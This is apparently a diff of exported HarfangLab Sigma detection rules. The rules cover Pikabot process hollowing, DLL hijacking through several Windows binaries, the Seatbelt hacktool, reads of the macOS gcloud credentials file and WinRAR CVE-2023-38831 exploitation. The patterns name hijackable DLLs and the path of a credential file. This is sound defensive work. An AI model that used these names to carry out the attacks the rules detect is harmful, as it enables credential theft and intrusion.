+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.080012Z",
+ "creation_date": "2026-03-23T11:45:34.080014Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.080018Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
+ "https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot",
+ "https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html",
+ "https://attack.mitre.org/techniques/T1055/"
+ ],
+ "name": "t1055_suspicious_searchprotocolhost_execution.yml",
+ "content": "title: Suspicious SearchProtocolHost.exe Execution\nid: 2e473606-203c-47b8-8899-647af707c98a\ndescription: |\n Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\n This technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\n Attackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\n It is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot\n - https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot\n - https://research.openanalysis.net/pikabot/debugging/string%20decryption/2023/11/12/new-pikabot.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/11/20\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - 
classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'SearchProtocolHost.exe'\n ProcessParentImage|contains: '?'\n\n filter_commandline:\n CommandLine|contains: ' Global\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2e473606-203c-47b8-8899-647af707c98a",
+ "rule_name": "Suspicious SearchProtocolHost.exe Execution",
+ "rule_description": "Detects the suspicious execution of the legitimate SearchProtocolHost.exe Windows binary without legitimate command-line arguments.\nThis technique has been used by the Pikabot malware, which starts SearchProtocolHost as a host for its payload, injected via process hollowing.\nAttackers can use process hollowing to inject malicious code into legitimate processes, allowing them to evade detection and execute harmful activities on a compromised system.\nIt is recommended to analyze actions taken by SearchProtocolHost as well as to look for other suspicious actions performed by the parent process.\n",
+ "rule_creation_date": "2023-11-20",
+ "rule_modified_date": "2025-09-23",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1055"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "2e58af7c-54b9-470d-b64b-f3731c941837",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ 
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.594471Z", + "creation_date": "2026-03-23T11:45:34.594474Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.594482Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_systemreset.yml", + "content": "title: DLL Hijacking via systemreset.exe\nid: 2e58af7c-54b9-470d-b64b-f3731c941837\ndescription: |\n Detects potential Windows DLL Hijacking via systemreset.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - 
attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systemreset.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\Cabinet.dll'\n - '\\d3d10warp.dll'\n - '\\d3d11.dll'\n - '\\dbgcore.DLL'\n - '\\DismApi.DLL'\n - '\\dxgi.dll'\n - '\\FVEAPI.dll'\n - '\\ReAgent.dll'\n - '\\ResetEngine.dll'\n - '\\tbs.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n - '\\WIMGAPI.DLL'\n - '\\WINHTTP.dll'\n - '\\WOFUTIL.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2e58af7c-54b9-470d-b64b-f3731c941837",
+ "rule_name": "DLL Hijacking via systemreset.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via systemreset.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious 
activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.588697Z",
+ "creation_date": "2026-03-23T11:45:34.588700Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.588708Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/xforcered/WFH",
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_wwahost.yml",
+ "content": "title: DLL Hijacking via WWAHost.exe\nid: 2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480\ndescription: |\n Detects potential Windows DLL Hijacking via WWAHost.exe.\n DLL hijacking takes advantage of the default Windows search order by 
positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WWAHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\profapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2e6c9be7-7b83-4cf8-8c6f-ffbf9b4ce480",
+ "rule_name": "DLL Hijacking via WWAHost.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via WWAHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a 
legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "2e734ab0-736c-4df7-904a-68429e75bea2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.606287Z",
+ "creation_date": "2026-03-23T11:45:34.606291Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.606298Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/GhostPack/Seatbelt",
+ "https://attack.mitre.org/techniques/T1082/"
+ ],
+ "name": "t1082_launch_seatbelt.yml",
+ "content": "title: Seatbelt HackTool Executed\nid: 2e734ab0-736c-4df7-904a-68429e75bea2\ndescription: 
|\n Detects the execution of the Seatbelt host enumeration and security assessment tool.\n Seatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\n Unless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\nreferences:\n - https://github.com/GhostPack/Seatbelt\n - https://attack.mitre.org/techniques/T1082/\ndate: 2021/04/26\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Seatbelt\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\Seatbelt.exe'\n - OriginalFileName: 'Seatbelt.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2e734ab0-736c-4df7-904a-68429e75bea2",
+ "rule_name": "Seatbelt HackTool Executed",
+ "rule_description": "Detects the execution of the Seatbelt host enumeration and security assessment tool.\nSeatbelt is an offensive security tool commonly used by attackers during the discovery phase to gather detailed system information, security configurations, and potential weaknesses that could be exploited for privilege escalation.\nUnless this execution is part of an authorized security audit, it is recommended to investigate the context of this activity including the user account involved and any data gathered by the tool, as it may indicate reconnaissance for an attack.\n",
+ "rule_creation_date": 
"2021-04-26", + "rule_modified_date": "2025-04-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1082" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098251Z", + "creation_date": "2026-03-23T11:45:34.098253Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098258Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1552/001/" + ], + "name": "t1552_004_gcp_config_read_macos.yml", + "content": "title: Suspicious Access to GCP Database File\nid: 2e7c5a05-6c01-4aac-b25c-16ea27b31087\ndescription: |\n Detects an attempt to read the content of the GCP database.\n Adversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - 
https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Users/*/.config/gcloud/credentials.db'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft 
Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - 
'/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n ProcessSignatureSigningId: 'Agent_final'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087",
+ "rule_name": "Suspicious Access to GCP Database File",
+ "rule_description": "Detects an attempt to read the content of the GCP database.\nAdversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
+ "rule_creation_date": "2024-06-18",
+ "rule_modified_date": "2025-10-29",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.credential_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1552.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "2e91d378-094f-4d0e-8695-ea6539ed28c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ 
"origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.084718Z", + "creation_date": "2026-03-23T11:45:34.084720Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.084724Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-38831", + "https://attack.mitre.org/techniques/T1203/" + ], + "name": "t1203_winrar_vulnerability.yml", + "content": "title: WinRAR CVE-2023-38831 Vulnerability Exploited\nid: 2e91d378-094f-4d0e-8695-ea6539ed28c9\ndescription: |\n Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\n WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\n This vulnerability was exploited in the wild in April through August 2023.\n It is recommended to investigate any child processes and alerts on the affected machine.\nreferences:\n - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-38831\n - https://attack.mitre.org/techniques/T1203/\ndate: 2023/08/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2023-38831\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-38831\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n ParentImage|endswith: '\\Winrar.exe'\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c 
?:\\Users\\\\*\\AppData\\Local\\Temp\\Rar$*\\'\n\n selection_extension:\n CommandLine|endswith:\n - ' .exe'\n - ' .cmd'\n - ' .bat'\n - ' .vbs'\n - ' .wsf'\n - ' .wsh'\n - ' .ps1'\n - ' .js'\n - ' .exe '\n - ' .cmd '\n - ' .bat '\n - ' .vbs '\n - ' .wsf '\n - ' .wsh '\n - ' .ps1 '\n - ' .js '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2e91d378-094f-4d0e-8695-ea6539ed28c9", + "rule_name": "WinRAR CVE-2023-38831 Vulnerability Exploited", + "rule_description": "Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\nWinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\nThis vulnerability was exploited in the wild in April through August 2023.\nIt is recommended to investigate any child processes and alerts on the affected machine.\n", + "rule_creation_date": "2023-08-25", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1203" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + 
"is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593612Z", + "creation_date": "2026-03-23T11:45:34.593616Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593623Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_systeminfo.yml", + "content": "title: DLL Hijacking via systeminfo.exe\nid: 2eedf312-fb18-46f6-8ce9-aed5bedd3dd7\ndescription: |\n Detects potential Windows DLL Hijacking via systeminfo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: 
library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systeminfo.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\mpr.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7", + "rule_name": "DLL Hijacking via systeminfo.exe", + "rule_description": "Detects potential Windows DLL Hijacking via systeminfo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ 